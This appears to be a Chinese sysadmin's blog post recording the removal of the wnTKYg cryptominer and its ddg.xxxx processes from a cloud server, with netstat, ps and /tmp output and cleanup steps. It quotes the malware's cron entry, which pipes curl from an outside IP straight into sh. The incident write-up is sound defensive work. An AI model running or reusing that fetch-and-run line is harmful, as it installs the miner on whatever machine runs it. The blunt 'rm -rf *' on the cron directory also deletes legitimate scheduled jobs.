记录清除wnTKYg挖矿工木马（守护进程ddg.xxxx）的过程

起因，阿里云多次提醒我的一台服务器有恶意发包行为，且给出了一些解决办法。之前也没太在意，就按照解决办法处理了一下。然后过一段时间，还是提示有此行为。

猜肯定是中了木马了，开始以为是被肉鸡了拿来做DDoS攻击别人了。今天去服务器上仔细看了一下。然后发现了问题究竟（目前猜应该如此，还等待观察）。

现将过程记录如下：

1、先查看一下端口情况，发现有些名为ddg.xxxx的进程很可疑。然后看了下远程的链接IP，美国、法国等地方，很奇怪。网上搜了一下，没什么结果。

[root@zhangtianguo ~]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22111           0.0.0.0:*               LISTEN      840/sshd            
tcp        0      0 127.0.0.1:32000         0.0.0.0:*               LISTEN      27121/java          
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      20918/memcached     
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      813/nginx: worker p 
tcp        0      0 0.0.0.0:81              0.0.0.0:*               LISTEN      1497/httpd          
tcp        0      0 0.0.0.0:82              0.0.0.0:*               LISTEN      1497/httpd          
tcp        0      0 0.0.0.0:83              0.0.0.0:*               LISTEN      1497/httpd          
tcp        0      0 0.0.0.0:85              0.0.0.0:*               LISTEN      1497/httpd          
tcp      401      0 我的IP:42388    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda 
tcp        0      1 我的IP:43968    52.2.199.2:8443         SYN_SENT    1620/ddg.1010       
tcp        0      1 我的IP:38258    54.222.159.38:8443      SYN_SENT    1620/ddg.1010       
tcp      401      0 我的IP:41811    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda 
tcp      401      0 我的IP:53489    140.205.140.205:80      CLOSE_WAIT  11393/AliYunDunUpda 
tcp        0      0 我的IP:59795    202.181.169.98:8443     ESTABLISHED 25125/ddg.2011      
tcp        0      0 我的IP:50071    212.83.189.246:443      ESTABLISHED 12908/wnTKYg        
tcp        0      1 我的IP:47592    106.75.74.11:9443       SYN_SENT    12799/ddg.1009      
tcp      371      0 10.174.208.36:51087     100.100.25.3:80         CLOSE_WAIT  11393/AliYunDunUpda 
tcp        0      0 我的IP:40019    106.11.68.13:80         ESTABLISHED 11448/AliYunDun     
tcp        0      0 127.0.0.1:32000         127.0.0.1:31001         ESTABLISHED 27119/wrapper       
tcp        0      1 我的IP:39511    39.108.56.56:8443       SYN_SENT    1620/ddg.1010       
tcp        0      1 我的IP:50528    121.69.45.254:8443      SYN_SENT    1620/ddg.1010       
tcp        0      1 我的IP:51132    106.75.71.242:8443      SYN_SENT    1620/ddg.1010       
tcp        0      1 我的IP:60425    120.77.46.195:8443      SYN_SENT    1620/ddg.1010       
tcp        0      1 我的IP:54458    116.39.7.114:8443       SYN_SENT    1620/ddg.1010       
tcp        0      1 我的IP:57546    54.183.178.110:8443     SYN_SENT    1620/ddg.1010       
tcp        0      1 我的IP:57686    106.75.134.239:8443     SYN_SENT    1620/ddg.1010       
tcp        0      1 我的IP:56848    61.65.191.22:8443       SYN_SENT    1620/ddg.1010       
tcp      401      0 我的IP:52910    106.11.68.13:80         CLOSE_WAIT  11393/AliYunDunUpda 
tcp        0    604 我的IP:22111    27.10.185.19:63158      ESTABLISHED 19368/sshd: root@pt 
tcp        0      1 我的IP:56357    165.225.157.157:8443    SYN_SENT    1620/ddg.1010       

2、然后，看了下这个进程的具体情况，居然是在/tmp/下的进程，心中更多抑或：

[root@zhangtianguo ~]# ps aux | grep ddg
root      1620  0.1  0.7 209684 13688 ?        Sl   Jul12  78:05 /tmp/ddg.1010
root     12799  0.0  0.2 262816  5460 ?        Sl   Jul01   9:32 /tmp/ddg.1009
root     19576  0.0  0.0 112644   960 pts/1    S+   10:01   0:00 grep --color=auto ddg
root     25125  0.0  0.2 207236  5172 ?        Sl   Aug27   2:13 /tmp/ddg.2011
root     28248  0.0  0.2 207192  4520 ?        Sl   Jul27  38:09 /tmp/ddg.1021

3、再去看看/tmp/下的文件，只有一个ddg.2011的文件，当时就心想，肯定是这些进程运行后，又自动删除了文件，看时间，8月创建的时间的文件，全部统统rm掉：

[root@zhangtianguo tmp]# ll -ah
total 9.6M
drwxrwxrwt.  9 root root 4.0K Aug 29 10:02 .
drwxr-xr-x. 20 root root 4.0K Jun 30 18:04 ..
srwxr-xr-x   1 root root    0 Aug 28 12:53 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>
-rwxr-xr-x   1 root root 9.5M Aug 11 10:13 ddg.2011
drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .font-unix
drwxr-xr-x   2 root root 4.0K Aug 17 10:07 hsperfdata_root
drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .ICE-unix
drwx------   3 root root 4.0K Nov 26  2015 systemd-private-nwO9vi
drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .Test-unix
drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .X11-unix
drwxrwxrwt.  2 root root 4.0K Nov 21  2014 .XIM-unix

4、再重复步骤1，查看端口情况，又发现了这个玩意儿，感觉不太正常（直觉）：

tcp        0      0 我的IP:50071    212.83.189.246:443      ESTABLISHED 12908/wnTKYg   

5、一搜，原来居然是个挖矿的程序貌似。原来已经有不少人中招过了。解决办法也有很多人给出了，基本上就是：

先给redis的问题处理掉，改端口、加密码之类；

查看/root/.ssh/下的文件，是否有异常登陆信息，有的话删掉；

搜索wnTKYg的相关文件（ find / -name *wnTKYg*），删掉；

删掉/tmp/下的异常文件（主要是ddg.xxxx之类的）；

kill掉wnTKYg以及ddg.xxxx的进程；

还有个问题，这个程序有个自动任务，从木马服务器下载程序执行，也要删掉：

cd /var/spool/cron
ll -ah
rm -rf *

我查看这个目录时，发现里面的自动任务是这样的，好像是印度一个IP：

[root@zhangtianguo cron]# cat root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh

至此，完工。然后继续观察。

参考资料。感谢：

http://blog.csdn.net/u010789532/article/details/70528648

http://blog.csdn.net/zimou5581/article/details/73064878